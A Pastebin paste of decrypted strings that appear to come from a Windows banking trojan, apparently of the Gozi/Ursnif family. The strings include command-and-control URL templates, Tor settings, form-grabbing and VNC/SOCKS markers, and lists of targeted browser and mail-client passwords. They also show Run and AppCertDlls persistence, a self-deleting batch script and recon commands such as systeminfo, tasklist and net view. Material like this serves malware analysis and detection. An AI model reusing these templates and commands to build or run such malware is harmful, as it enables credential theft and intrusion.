API tools faq
paste
Advertisement
Guest User

Decrypted

a guest
Jan 6th, 2019
297
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.84 KB | None | 0 0
raw download clone embed print report
  1. ADVAPI32.DLL.CryptGetUserKey.KERNEL32.DLL.LoadLibraryExW.WS2_32.DLL.WSARecv.WSASend.closesocket.recv.CHROME.DLL.soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x.version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s.&ip=%s.&os=%s.%u.%u_%u_%u_x%u.&tor=1.Mozilla/5.0 (Windows NT %u.%u%s; rv:62.0) Gecko/20100101 Firefox/62.0.http://.https://.file://.USER.ID.%lu.exe./upd %lu.Software\AppDataLow\Software\Microsoft\.Main.Block.Temp.Client.Ini.Keys.Scr.Kill.LastTask.LastConfig.CrHook.OpHook.Exec..onion.TorClient.TorCrc.%s %s HTTP/1.1
  2. Host: %s
  3. User-Agent: %s
  4. Connection: close;
  5. Content-length: %u
  6.  
  7. ...\.http://constitution.org/usdeclar.txt.C:\Program Files\Internet Explorer\iexplore.exe.Software\Microsoft\Windows\CurrentVersion\Run.System\CurrentControlSet\Control\Session Manager\AppCertDlls.text.image.json.html.javascript.xml.URL: %s
  8. user=%s
  9. pass=%s.URL: %s
  10. REF: %s
  11. LANG: %s
  12. AGENT: %s
  13. COOKIE: %s
  14. POST: .USERID: %s
  15. .USER: %s
  16. .DEVICE: %s
  17. CLASS: %s
  18. INTERFACE: %s
  19. ADD: %u
  20. .@%s@.grabs=.HIDDEN.%08x%08x%08x%08x.@ID@.@GROUP@.@RANDSTR@.@URL=*@.@CONFIG=*@.@VIDEO=*@.@SOCKS=*@.@KILL=*@.@VNC=*@.%s.%s.http..bat..bin.64.Local\..\\.\pipe\.%APPDATA%\Microsoft\.%APPDATA%.form.log.keys.POST.Content-Disposition: form-data; name="upload_file"; filename="%s".P.O.S.T...--%s
  21. %s
  22.  
  23. .--%s--
  24. .G.E.T...GET.-01.%u%u%u.Content-Type: multipart/form-data; boundary=%s.Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu".Content-Type: application/octet-stream.{%08X-%04X-%04X-%04X-%08X%04X}.%08X-%04X-%04X-%04X-%08X%04X.S:(ML;;NW;;;LW)D:(A;;0x1fffff;;;WD)(A;;0x1fffff;;;S-1-15-2-1).\Run.o.p.e.n...%lu.bat.attrib -r -s -h %%1
  25. :%u
  26. del %%1
  27. if exist %%1 goto %u
  28. del %%0
  29. .\Vars.\Files.\Config./data.php?version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s./UPD./SD./sd %lu.\Software\Microsoft\Windows\CurrentVersion.**.%.A.P.P.D.A.T.A.%.\.M.o.z.i.l.l.a.\.F.i.r.e.f.o.x.\.P.r.o.f.i.l.e.s...EnableSPDY3_0.\.M.a.c.r.o.m.e.d.i.a.\.F.l.a.s.h. .P.l.a.y.e.r.\...c.o.o.k.i.e.s...s.q.l.i.t.e...NSPR4.DLL.c.o.o.k.i.e.s...s.q.l.i.t.e.-.j.o.u.r.n.a.l...NSS3.DLL.ieui.*...s.o.l...*...t.x.t...\.c.o.o.k.i.e...f.f...OPERA.EXE.\.c.o.o.k.i.e...i.e...NTDLL.DLL.\.s.o.l.s...\.\.?.\...ieapfltr.Content-MD5:.*...*...q.w.e.r.t.y...Accept-Encoding:.Cookie: . .-.-.u.s.e.-.s.p.d.y.=.o.f.f. .-.-.d.i.s.a.b.l.e.-.h.t.t.p.2...g.i.f...j.p.e.g...SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings.Content-Encoding:.%.0.2.u.-.%.0.2.u.-.%.0.2.u. .%.0.2.u.:.%.0.2.u.:.%.0.2.u.
  30. .
  31. .%.s.
  32. .
  33. .%.s.
  34. .
  35. .
  36. .
  37. .%.s.
  38. .
  39. .
  40. .
  41. ...%.0.2.u.-.%.0.2.u.-.%.0.2.u. .%.0.2.u.:.%.0.2.u.:.%.0.2.u.
  42. .
  43. .C.l.i.p.b.o.a.r.d.
  44. .
  45. .
  46. .
  47. .%.s.
  48. .
  49. .
  50. .
  51. ...Host:.W.i.n.d.o.w.s. .E.x.p.l.o.r.e.r...Content-Type:.D.e.l.e.g.a.t.e.E.x.e.c.u.t.e...S.O.F.T.W.A.R.E.\.C.l.a.s.s.e.s.\.C.h.r.o.m.e...c.o.m.m.a.n.d...*...*...WININET.DLL.WSOCK32.DLL.WININET.dll.VERSION.dll.kernelbase.ieframe.urlmon.mshtml.inetcpl.cpl.NTDSAPI.DLL.User-Agent:.Connection:.Content-Length:.Transfer-Encoding:.Referer: .Accept-Language: .Content-Security-Policy:.Content-Security-Policy-Report-Only:.X-Frame-Options.Access-Control-Allow-Origin:.Cache-Control:.Last-Modified:.Etag:.no-cache, no-store, must-revalidate.%x
  52. .ocsp. chunked. identity. gzip, deflate.gzip.
  53.  
  54. .HTTP/1.1 404 Not Found
  55.  
  56. .%02u:%02u:%02u .EMPTY
  57. .Cmd %s processed: %u. | "%s" | %u
  58. .Cmd %u parsing: %u.PR_Read.PR_Write.PR_Close.cmd /C "%s> %s1".systeminfo.exe .tasklist.exe /SVC >.driverquery.exe >.reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >.cmd /U /C "type %s1 > %s & del %s1".net view >.nslookup 127.0.0.1 >.echo -------- >.nslookup myip.opendns.com resolver1.opendns.com .ss: *.*.*.*
  59. .Unknown..pfx.My.AddressBook.AuthRoot.CertificateAuthority.Disallowed.Root.TrustedPeople.TrustedPublisher.InternetSetStatusCallback.HttpAddRequestHeadersW.HttpAddRequestHeadersA.HttpQueryInfoW.HttpQueryInfoA.InternetConnectW.InternetConnectA.InternetQueryDataAvailable.HttpSendRequestW.HttpSendRequestA.InternetReadFileExW.InternetReadFileExA.InternetWriteFile.InternetReadFile.HttpOpenRequestW.RegQueryValueExW.RegGetValueW.PR_Poll.PR_GetError.PR_SetError.ExitProcess.LdrRegisterDllNotification.LdrUnregisterDllNotification.CreateProcessA.CreateProcessW.CreateProcessAsUserA.CreateProcessAsUserW.ZwGetContextThread.ZwSetContextThread.ZwWriteVirtualMemory.ZwWow64QueryInformationProcess64.ZwWow64ReadVirtualMemory64.ZwProtectVirtualMemory.LdrLoadDll.LdrGetProcedureAddress.LoadLibraryA.RtlExitUserThread.CreateRemoteThread.%02u-%02u-%02u %02u:%02u:%02u
  60. .PluginRegisterCallbacks..rdata....text.....data....DLL load status: %u.%s=%s&.0123456789ABCDEF.Main.Blocked.
  61. user_pref("network.http.spdy.enabled", false);..avi.p.r.e.f.s...j.s...%s=%s&./.HTTPMail.SMTP.POP3.IMAP.none.WABOpen.Software\Microsoft\Windows Mail.Software\Microsoft\Windows Live Mail.Store Root.Salt.account{*}.oeaccount.Server.User_Name.Password2.Port.Secure_Connection.A.c.c.o.u.n.t._.N.a.m.e...NSS_Init.hostname.t.y.p.e.=.%.S.,. .n.a.m.e.=.%.S.,. .a.d.d.r.e.s.s.=.%.S.,. .s.e.r.v.e.r.=.%.S.,. .p.o.r.t.=.%.u.,. .s.s.l.=.%.S.,. .u.s.e.r.=.%.S.,. .p.a.s.s.w.o.r.d.=.%.S...PK11_Authenticate.t.y.p.e.=.%.S.,. .n.a.m.e.=.%.s.,. .a.d.d.r.e.s.s.=.%.s.,. .s.e.r.v.e.r.=.%.s.,. .p.o.r.t.=.%.u.,. .s.s.l.=.%.s.,. .u.s.e.r.=.%.s.,. .p.a.s.s.w.o.r.d.=.%.s...NSS_Shutdown..gif.M.e.s.s.a.g.e.A.c.c.o.u.n.t...PK11_FreeSlot.S.M.T.P._.E.m.a.i.l._.A.d.d.r.e.s.s...encryptedUsername.%.S._.%.S...0.x...encryptedPassword.E.m.a.i.l.A.d.d.r.e.s.s.C.o.l.l.e.c.t.i.o.n./.E.m.a.i.l.A.d.d.r.e.s.s.[.%.u.]./.A.d.d.r.e.s.s...S.o.f.t.w.a.r.e.\.M.i.c.r.o.s.o.f.t.\.O.f.f.i.c.e.\.1.5...0.\.O.u.t.l.o.o.k.\.P.r.o.f.i.l.e.s.\.O.u.t.l.o.o.k.\...",.&uptime=%u.S.o.f.t.w.a.r.e.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .N.T.\.C.u.r.r.e.n.t.V.e.r.s.i.o.n.\.W.i.n.d.o.w.s. .M.e.s.s.a.g.i.n.g. .S.u.b.s.y.s.t.e.m.\.P.r.o.f.i.l.e.s.\.O.u.t.l.o.o.k.\...&time=%lu.S.o.f.t.w.a.r.e.\.M.i.c.r.o.s.o.f.t.\.O.f.f.i.c.e.\.1.6...0.\.O.u.t.l.o.o.k.\.P.r.o.f.i.l.e.s.\.O.u.t.l.o.o.k.\...%systemroot%\syswow64\cmd.exe.E.m.a.i.l...A.c.c.o.u.n.t. .N.a.m.e....jpeg.I.M.A.P. .S.e.r.v.e.r...I.M.A.P. .P.o.r.t...I.M.A.P. .U.s.e.r...I.M.A.P. .P.a.s.s.w.o.r.d...I.M.A.P. .U.s.e. .S.S.L....bmp..avi.P.O.P.3. .U.s.e.r...P.O.P.3. .S.e.r.v.e.r...P.O.P.3. .P.o.r.t...P.O.P.3. .P.a.s.s.w.o.r.d...P.O.P.3. .U.s.e. .S.S.L...&action=%08x.Client32.S.M.T.P. .U.s.e.r...S.M.T.P. .S.e.r.v.e.r...S.M.T.P. .P.o.r.t...S.M.T.P. .P.a.s.s.w.o.r.d...S.M.T.P. .U.s.e. .S.S.L...Client64.%systemroot%\system32\c_1252.nls.A.8.0.0.0.A...ICGetInfo.1...0...n.s.s.3...d.l.l...PK11_GetInternalKeySlot.PK11SDR_Decrypt.://.DllRegisterServer.%.P.R.O.G.R.A.M.F.I.L.E.S.%.\.M.o.z.i.l.l.a. .T.h.u.n.d.e.r.b.i.r.d.....%.U.S.E.R.P.R.O.F.I.L.E.%.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.T.h.u.n.d.e.r.b.i.r.d.\.P.r.o.f.i.l.e.s.\.*...d.e.f.a.u.l.t.....\.l.o.g.i.n.s...j.s.o.n...../.C. .p.a.u.s.e. .m.a.i.l...%c%02X.\\.\%s...r.u.n.d.l.l.3.2...msvfw32.ICOpen.ICClose.ICInfo.ICSendMessage.\*.dll....r.u.n.d.l.l.3.2. .".%.s.".,.%.S.......e.x.e.......d.l.l.....*...b.i.n
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!